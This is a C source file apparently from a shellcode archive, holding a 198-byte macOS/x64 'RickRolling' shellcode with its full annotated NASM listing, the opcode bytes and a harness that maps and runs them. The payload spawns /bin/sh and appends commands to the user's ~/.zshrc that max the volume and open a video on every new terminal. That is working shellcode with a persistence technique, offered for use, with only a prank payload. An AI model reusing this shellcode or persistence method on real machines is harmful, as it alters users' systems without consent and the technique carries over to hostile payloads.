/*
## Shellcode Title: macOS/x64 - zsh RickRolling Shellcode (198 Bytes)
## Shellcode Author: Bobby Cooke
## Date: May 31st, 2020
## Tested on: macOS Catalina v10.15.4
## Shellcode Description:
## macOS Catalina dynamic (position-independent), null-free shellcode that unmutes the system volume, sets it to maximum, and "Rick Rolls" the user every time they open a Z-Shell terminal window.
## The shellcode uses the execve syscall to spawn /bin/sh. The shell runs an echo command that appends two commands to the user's Z-Shell (zsh) run-commands file (~/.zshrc); the file is created if it does not exist. The first command uses the macOS default system binary osascript (/usr/bin/osascript) to unmute the system and set the volume to maximum. The second command uses the macOS default system binary open (/usr/bin/open) to open the 'Rick Astley - Never Gonna Give You Up' video in the system's default browser. Note: the two lines are appended (>>) on every run and persist until removed by hand, and execve replaces the calling process, so the harness below does not return on success — run it only in a disposable VM or throwaway account.
## C Compile: gcc zsh-rickrolling.c -o zsh-rickrolling
## Apple clang version 11.0.3 (clang-1103.0.32.62)
## Compile & Test:
## root# gcc zsh-rickrolling.c -o zsh-rickrolling
## root# cat ~/.zshrc
## cat: /var/root/.zshrc: No such file or directory
## root# ./zsh-rickrolling
## Shellcode Length: 198 Bytes
## root# cat ~/.zshrc
## osascript -e "set Volume 9"
## open "https://www.youtube.com/watch?v=dQw4w9WgXcQ"
## root# zsh
## root@Mac #
## < Browser Pop & Rick Roll >

---------------------------------------------------------------------

;## ASM Compile: nasm -f macho64 zsh-rickrolling.asm
;## NASM version 2.14.02 compiled on Sep 28 2019
;## OBJ Link: ld zsh-rickrolling.o -lSystem -o zsh-rickrolling
;## BUILD 17:57:49 Apr 24 2020
;## Get SC (bash): for x in $(objdump -d zsh-rickrolling.o -x86-asm-syntax=intel | grep "^ " | cut -f1 | awk -F: '{print $2}'); do echo -n "\x"$x; done; echo
global _main
_main:
; execve(const char *path, char *const argv[], char *const envp[]);
; XNU x86-64 syscall ABI: RAX = syscall number, arguments in RDI, RSI, RDX.
; RAX = 0x200003b = execve (0x2000000 BSD-class prefix | 0x3b)
; RDI = &"/bin/sh\x00"
; RSI = RSP, i.e. the argv[] array built on the stack by loadArgv:
;   [RSP+0x00] = argv[0] = &"/bin/sh\x00"
;   [RSP+0x08] = argv[1] = &"-c\x00"
;   [RSP+0x10] = argv[2] = &`echo 'osascript ... >> ~/.zshrc\x00`
;   [RSP+0x18] = NULL (argv terminator)
; RDX = 0x0 (envp = NULL)
; No instruction encodes a 0x00 byte: the NUL terminators are produced at run
; time by the shr in argv0 and by the zero upper bytes of registers written
; through their 16-bit halves (dx, cx).
regclear:
xor rsi, rsi ; rsi = 0x0
mul rsi ; rdx:rax = rax * 0 -> rax = rdx = 0x0 without a zero immediate
argv0:
mov rcx, 0x68732f6e69622fff ; little-endian "\xff/bin/sh"; 0xff pads the high byte so no NUL is encoded
shr rcx, 0x8 ; shift the pad byte out: rcx = "/bin/sh\x00"
push rcx ; [rsp] = "/bin/sh\x00"
mov rdi, rsp ; rdi = path = &"/bin/sh\x00"
argv1:
add dx, 0x632d ; rdx was 0: low word = "-c", upper bytes stay 0 -> "-c\x00"
push rdx ; [rsp] = "-c\x00"
mov rbx, rsp ; rbx = &"-c\x00" (kept for loadArgv)
argv2:
; Builds, 8 bytes per push starting from the tail, the string handed to sh -c:
; echo 'osascript -e "set Volume 9"\r\nopen "https://www.youtube.com/watch?v=dQw4w9WgXcQ"' >> ~/.zshrc
; \r\n (0x0D 0x0A) separates the two zsh commands; the trailing NUL comes from
; the zero-extended cx push. The comments below show each chunk in memory order.
; String length : 98
xor rcx, rcx
add cx, 0x6372 ; "rc\x00..." (end of ".zshrc")
push rcx
mov rcx, 0x68737a2e2f7e203e ; "> ~/.zsh"
push rcx
mov rcx, 0x3e20272251635867 ; "gXcQ\"' >"
push rcx
mov rcx, 0x573977347751643d ; "=dQw4w9W"
push rcx
mov rcx, 0x763f68637461772f ; "/watch?v"
push rcx
mov rcx, 0x6d6f632e65627574 ; "tube.com"
push rcx
mov rcx, 0x756f792e7777772f ; "/www.you"
push rcx
mov rcx, 0x2f3a737074746822 ; "\"https:/"
push rcx
mov rcx, 0x206e65706f0A0D22 ; "\"\r\nopen "
push rcx
mov rcx, 0x3920656d756c6f56 ; "Volume 9"
push rcx
mov rcx, 0x207465732220652d ; "-e \"set "
push rcx
mov rcx, 0x2074706972637361 ; "ascript "
push rcx
mov rcx, 0x736f27206f686365 ; "echo 'os"
push rcx
mov r9, rsp ; r9 = argv[2] = &"echo 'osascript ..."
loadArgv:
xor rdx, rdx ; rdx = envp = NULL
push rdx ; [RSP+0x18] = NULL, terminates argv[]
push r9 ; [RSP+0x10] = argv[2] = &command string
push rbx ; [RSP+0x08] = argv[1] = &"-c\x00"
push rdi ; [RSP+0x00] = argv[0] = &"/bin/sh\x00"
mov rsi, rsp ; rsi = argv
execve:
mov al,2 ; rax = 0x2 (upper bytes still 0 from mul)
ror rax, 0x28 ; rotate right 40 bits: rax = 0x2000000
mov al, 0x3b ; rax = 0x200003b = execve
syscall ; on success the process image is replaced by /bin/sh; returns only on failure

---------------------------------------------------------------------

*/

#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>

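/* Function pointer through which main() jumps into the mapped shellcode. */
int (*sc)(void);

/*
 * 198-byte macOS/x64 shellcode, byte-for-byte the NASM listing in the header
 * comment: execve("/bin/sh", {"/bin/sh", "-c", "echo '...' >> ~/.zshrc", NULL}, NULL).
 * The page this was taken from had lost the backslashes of every \xHH escape;
 * they are restored here so the literal is the opcode bytes, not ASCII "x48x31...".
 * Contains no 0x00 byte, so strlen(shellcode) == 198 and sizeof(shellcode) == 199
 * (implicit terminating NUL). It does contain 0x0D 0x0A, the line break between
 * the two zsh commands.
 */
char shellcode[] =
"\x48\x31\xf6\x48\xf7\xe6\x48\xb9\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48"
"\xc1\xe9\x08\x51\x48\x89\xe7\x66\x81\xc2\x2d\x63\x52\x48\x89\xe3\x48"
"\x31\xc9\x66\x81\xc1\x72\x63\x51\x48\xb9\x3e\x20\x7e\x2f\x2e\x7a\x73"
"\x68\x51\x48\xb9\x67\x58\x63\x51\x22\x27\x20\x3e\x51\x48\xb9\x3d\x64"
"\x51\x77\x34\x77\x39\x57\x51\x48\xb9\x2f\x77\x61\x74\x63\x68\x3f\x76"
"\x51\x48\xb9\x74\x75\x62\x65\x2e\x63\x6f\x6d\x51\x48\xb9\x2f\x77\x77"
"\x77\x2e\x79\x6f\x75\x51\x48\xb9\x22\x68\x74\x74\x70\x73\x3a\x2f\x51"
"\x48\xb9\x22\x0d\x0a\x6f\x70\x65\x6e\x20\x51\x48\xb9\x56\x6f\x6c\x75"
"\x6d\x65\x20\x39\x51\x48\xb9\x2d\x65\x20\x22\x73\x65\x74\x20\x51\x48"
"\xb9\x61\x73\x63\x72\x69\x70\x74\x20\x51\x48\xb9\x65\x63\x68\x6f\x20"
"\x27\x6f\x73\x51\x49\x89\xe1\x48\x31\xd2\x52\x41\x51\x53\x57\x48\x89"
"\xe6\xb0\x02\x48\xc1\xc8\x28\xb0\x3b\x0f\x05";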

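/*
 * Harness: copy the shellcode into an anonymous mapping and jump to it.
 *
 * WARNING: on success the execve() inside the shellcode replaces this process
 * with /bin/sh, which appends two lines to the invoking user's ~/.zshrc
 * (persistence that survives until removed by hand). Run only in a disposable
 * VM or throwaway account. main() returns 0 only if the shellcode came back,
 * i.e. the syscall failed.
 *
 * Fixes relative to the original harness:
 *  - mmap'd a fixed 0x22 bytes and then memcpy'd the full 199-byte array,
 *    relying on page rounding; the mapping is now sized from the array.
 *  - the page is mapped RW, filled, then flipped to RX with mprotect(), so it
 *    is never writable and executable at the same time.
 *  - strlen() returns size_t, so the format is %zu (was %zd) and the line is
 *    newline-terminated.
 * NOTE(review): tested target is Intel Catalina; Apple Silicon hosts also
 * require MAP_JIT for executable anonymous mappings — not handled here.
 */
int main(int argc, char **argv) {
    (void)argc;
    (void)argv;

    /* The shellcode is NUL-free, so strlen() equals its length (198). */
    printf("Shellcode Length: %zu Bytes\n", strlen(shellcode));

    size_t len = sizeof(shellcode);
    void *ptr = mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
    if (ptr == MAP_FAILED) {
        perror("mmap");
        exit(-1);
    }

    memcpy(ptr, shellcode, len);

    /* W^X: drop write before making the page executable. */
    if (mprotect(ptr, len, PROT_READ | PROT_EXEC) != 0) {
        perror("mprotect");
        munmap(ptr, len);
        exit(-1);
    }

    sc = (int (*)(void))ptr;
    sc();   /* does not return if execve succeeds */

    return 0;
}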